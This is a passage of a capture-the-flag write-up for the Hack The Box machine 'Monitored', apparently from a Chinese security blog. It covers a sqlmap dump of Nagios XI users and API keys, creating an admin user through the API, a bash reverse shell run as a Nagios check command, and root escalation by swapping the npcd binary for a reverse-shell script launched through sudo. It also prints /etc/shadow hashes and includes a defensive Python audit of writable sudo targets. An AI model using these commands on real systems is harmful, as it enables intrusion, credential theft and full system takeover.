| 11 | [email protected] | geqian | XX0FrT4mKl0KcOIAAC6IilZCJkrqEkGag5rLIsUZ0YqSFC8LRDF8bP0qgRdPlQ5r | 1 | $2a$10$f5149f642d681ab41e09euzmac61tKRbKM4sVRlsLajUbJgvRDljG | geqian | 0 | 1705761542 | 0 | 0 | 0 | 0 | akv9G37D9PH4BZ4GnHG2FlVKo3oJF76La586sjZtqqWmDejvp2H4l7v0iUEHXrVq | 0 | 0 | 1705761615 |
+---------+------------------------+----------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
[10:02:33] [INFO] table 'nagiosxi.xi_users' dumped to CSV file '/root/.local/share/sqlmap/output/nagios.monitored.htb/dump/nagiosxi/xi_users.csv'
[10:02:33] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/nagios.monitored.htb'
[*] ending @ 10:02:33 /2024-01-20/
The dump includes every user's api_key. With nagiosadmin's key, a POST to the Nagios XI API creates a new user with auth_level=admin, authenticated by that key alone:
┌──(kali㉿kali)-[~/Desktop/htb/Monitored]
└─$ curl -k -X POST "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=geqian&password=geqian&name=geqian&[email protected]&auth_level=admin"
{
"success": "User account geqian was added successfully!",
"user_id": 11
}
revshell
The account is created. Log in as it, open the Core Config Manager and add a command whose command line is:
bash -c 'bash -i >& /dev/tcp/10.10.14.64/4444 0>&1'
Then go to Monitoring > Services > Add New, attach that command as the service's check command and run it; the reverse shell lands as the nagios user.
ROOT
nagios@monitored:~$ sudo -l
Matching Defaults entries for nagios on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User nagios may run the following commands on localhost:
(root) NOPASSWD: /etc/init.d/nagios start
(root) NOPASSWD: /etc/init.d/nagios stop
(root) NOPASSWD: /etc/init.d/nagios restart
(root) NOPASSWD: /etc/init.d/nagios reload
(root) NOPASSWD: /etc/init.d/nagios status
(root) NOPASSWD: /etc/init.d/nagios checkconfig
(root) NOPASSWD: /etc/init.d/npcd start
(root) NOPASSWD: /etc/init.d/npcd stop
(root) NOPASSWD: /etc/init.d/npcd restart
(root) NOPASSWD: /etc/init.d/npcd reload
(root) NOPASSWD: /etc/init.d/npcd status
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
(root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
(root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
(root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
Looking around those directories: /usr/local/nagiosxi/scripts/manage_services.sh starts and stops services as root, and the daemon it (re)starts, /usr/local/nagios/bin/npcd, is owned by the nagios user. Nothing stops nagios from replacing that binary with a script, so swap in a reverse shell and let root launch it:
nagios@monitored:~$ rm /usr/local/nagios/bin/npcd
nagios@monitored:~$ vi /usr/local/nagios/bin/npcd
nagios@monitored:~$ chmod 777 /usr/local/nagios/bin/npcd
nagios@monitored:/usr/local/nagios/bin$ cat /usr/local/nagios/bin/npcd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.64/5555 0>&1
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh restart np
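The general check behind that escalation: for every NOPASSWD sudo target, follow the absolute paths it references and ask whether the current user can write to any of them (or to their directory). The Python below is an added example, mine and not from the writeup. The scripts it builds in a temporary directory are constructed stand-ins with hypothetical contents; only the sudo -l entries and the npcd path come from the box. Writability is decided from mode bits for the given uid rather than os.access, so the result is the same whether the demo runs as a normal user or as root.

```python
import os
import re
import stat
import tempfile

# Constructed copy of the sudo -l entries from this box (only the parts the audit needs).
SUDO_L = """User nagios may run the following commands on localhost:
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
"""

# Hypothetical contents of the scripts on the privilege path (the real ones differ in detail):
# manage_services.sh hands the service name to an init script, which runs a daemon by absolute path.
DEMO_FILES = {
    "/usr/local/nagiosxi/scripts/manage_services.sh": "#!/bin/bash\n/etc/init.d/$2 $1\n",
    "/usr/local/nagiosxi/scripts/reset_config_perms.sh": "#!/bin/bash\nchown -R nagios /usr/local/nagios/etc\n",
    "/etc/init.d/npcd": "#!/bin/sh\nDAEMON=/usr/local/nagios/bin/npcd\n$DAEMON -f /usr/local/nagios/etc/pnp/npcd.cfg\n",
    "/usr/local/nagios/bin/npcd": "ELF-placeholder\n",
}
# Everything root-style 0o555 except the daemon binary, which (as on the box) its runtime user may write.
DEMO_MODES = {p: 0o555 for p in DEMO_FILES}
DEMO_MODES["/usr/local/nagios/bin/npcd"] = 0o755

PATH_RE = re.compile(r"(?<![\w./-])/(?:[\w.+-]+/)+[\w.+-]+")


def _writable(st, uid, gids):
    """POSIX mode-bit check for one identity (unlike os.access, unchanged when run as root)."""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def parse_nopasswd_targets(sudo_output):
    """Absolute paths named in every NOPASSWD entry (command and its fixed arguments)."""
    targets = []
    for line in sudo_output.splitlines():
        if "NOPASSWD:" in line:
            targets.extend(PATH_RE.findall(line.split("NOPASSWD:", 1)[1]))
    return targets


def audit(sudo_output, root="", uid=None, gids=None, depth=3):
    """Return {path: reason} for each sudo target, and each absolute path its text references
    (followed transitively up to `depth`), that the identity could modify or replace."""
    uid = os.getuid() if uid is None else uid
    gids = set(os.getgroups()) if gids is None else set(gids)
    findings, seen = {}, set()
    queue = [(p, 0) for p in parse_nopasswd_targets(sudo_output)]
    while queue:
        path, d = queue.pop()
        if path in seen:
            continue
        seen.add(path)
        full = root + path
        try:
            st = os.stat(full)
        except FileNotFoundError:
            try:
                if _writable(os.stat(os.path.dirname(full)), uid, gids):
                    findings[path] = "missing, but its directory is writable (a file could be planted)"
            except FileNotFoundError:
                pass
            continue
        if _writable(st, uid, gids):
            findings[path] = "writable by this user"
        elif _writable(os.stat(os.path.dirname(full)), uid, gids):
            findings[path] = "its directory is writable (file could be replaced)"
        if d < depth and stat.S_ISREG(st.st_mode):
            with open(full, errors="replace") as f:
                queue.extend((p, d + 1) for p in PATH_RE.findall(f.read()))
    return findings


def build_demo_tree(root):
    """Lay out the constructed files under `root`, then lock the directories down like a root install."""
    for rel, body in DEMO_FILES.items():
        full = root + rel
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as f:
            f.write(body)
        os.chmod(full, DEMO_MODES[rel])
    for dirpath, _, _ in os.walk(root):
        os.chmod(dirpath, 0o555)


def run_demo():
    """Build the tree in a temp dir, audit it as the current user, restore perms, return findings."""
    with tempfile.TemporaryDirectory() as root:
        try:
            build_demo_tree(root)
            return audit(SUDO_L, root=root)
        finally:
            for dirpath, _, _ in os.walk(root):
                os.chmod(dirpath, 0o755)


if __name__ == "__main__":
    for path, reason in run_demo().items():
        print(f"{path}: {reason}")
```

On a real host run it as `audit(open("sudo-l.txt").read())` with the saved sudo -l output; the only finding on the demo tree is /usr/local/nagios/bin/npcd, reached through /etc/init.d/npcd, which is exactly the chain the commands above abuse. The same check also flags the lesser case where the file is root-owned but its directory is not, since a rename-and-replace works just as well there.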
Root. /etc/shadow from the new shell:
root:$y$j9T$LLy.W6CI0K6McgXMKio0i1$1omBVYjsg.8qEzyjkL.3kXtpAMZNc7x9CMwOnrwltJ8:19671:0:99999:7:::
daemon:*:19670:0:99999:7:::
bin:*:19670:0:99999:7:::
sys:*:19670:0:99999:7:::
sync:*:19670:0:99999:7:::
games:*:19670:0:99999:7:::
man:*:19670:0:99999:7:::
lp:*:19670:0:99999:7:::
mail:*:19670:0:99999:7:::
news:*:19670:0:99999:7:::
uucp:*:19670:0:99999:7:::
proxy:*:19670:0:99999:7:::
www-data:*:19670:0:99999:7:::
backup:*:19670:0:99999:7:::
list:*:19670:0:99999:7:::
irc:*:19670:0:99999:7:::
gnats:*:19670:0:99999:7:::
nobody:*:19670:0:99999:7:::
_apt:*:19670:0:99999:7:::
systemd-network:*:19670:0:99999:7:::
systemd-resolve:*:19670:0:99999:7:::
messagebus:*:19670:0:99999:7:::
systemd-timesync:*:19670:0:99999:7:::
avahi-autoipd:*:19670:0:99999:7:::
sshd:*:19670:0:99999:7:::
svc:$y$j9T$JKvaJakBax4xU3.kZFe221$D2o.A3O6EXWgKPzpD8Gky7cPbXZ/a9Ey/9/OM1AoE80:19671:0:99999:7:::
systemd-coredump:!*:19670::::::
mysql:!:19670:0:99999:7:::
ntp:*:19670:0:99999:7:::
postgres:*:19670:0:99999:7:::
Debian-exim:!:19670:0:99999:7:::
uuidd:*:19670:0:99999:7:::
openldap:!:19670:0:99999:7:::
Debian-snmp:!:19670:0:99999:7:::
snmptt:*:19670:0:99999:7:::
shellinabox:*:19670:0:99999:7:::
nagios:$y$j9T$EnaS672RtIQB0i6zh.ooO/$gkWPA1PKoIQH.ACc6NVntLPY9x55i08J4S6c1Rpvqn.:19671:0:99999:7:::
_laurel:!:19698::::::
Originally published on the WeChat public account 搁浅安全: HTB-Monitored (Medium)